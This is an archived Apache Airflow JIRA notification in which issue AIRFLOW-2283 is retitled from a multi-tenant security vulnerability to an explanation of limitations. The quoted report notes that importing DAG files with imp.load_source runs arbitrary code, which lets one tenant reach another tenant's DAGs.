You are viewing a plain text version of this content. The canonical link for it is here.
Posted to commits@airflow.apache.org by "Ash Berlin-Taylor (JIRA)" <ji...@apache.org> on 2018/09/06 09:37:00 UTC
[jira] [Updated] (AIRFLOW-2283) Explain multi-Tenant security
limitations
[ https://issues.apache.org/jira/browse/AIRFLOW-2283?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Ash Berlin-Taylor updated AIRFLOW-2283:
---------------------------------------
Flags: (was: Important)
Remaining Estimate: (was: 168h)
Original Estimate: (was: 168h)
Component/s: (was: webserver)
(was: security)
(was: scheduler)
(was: models)
Summary: Explain multi-Tenant security limitations (was: Multi-Tenant security vulnerability)
> Explain multi-Tenant security limitations
> -----------------------------------------
>
> Key: AIRFLOW-2283
> URL: https://issues.apache.org/jira/browse/AIRFLOW-2283
> Project: Apache Airflow
> Issue Type: Bug
> Affects Versions: 1.8.0
> Environment: Any/All
> Reporter: Garrett Summers
> Priority: Major
> Labels: security
>
> We noticed what we think to be a potential security vulnerability when importing dag files in the following line:
> {{m = imp.load_source(mod_name, filepath)}}
> This line in the DagBag.process_file code imports the dag files available, but this causes all of the code in the file to actually execute (which could be any arbitrary code). If the dags for different tenants are being stored in a common dag structure (even though the are filtered for the different tenants) then the arbitrary code execution would make it possible for one tenant to access/modify the dags of other tenants. This would be a major problem for users who utilize the multi-tenant functionality in Airflow.
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)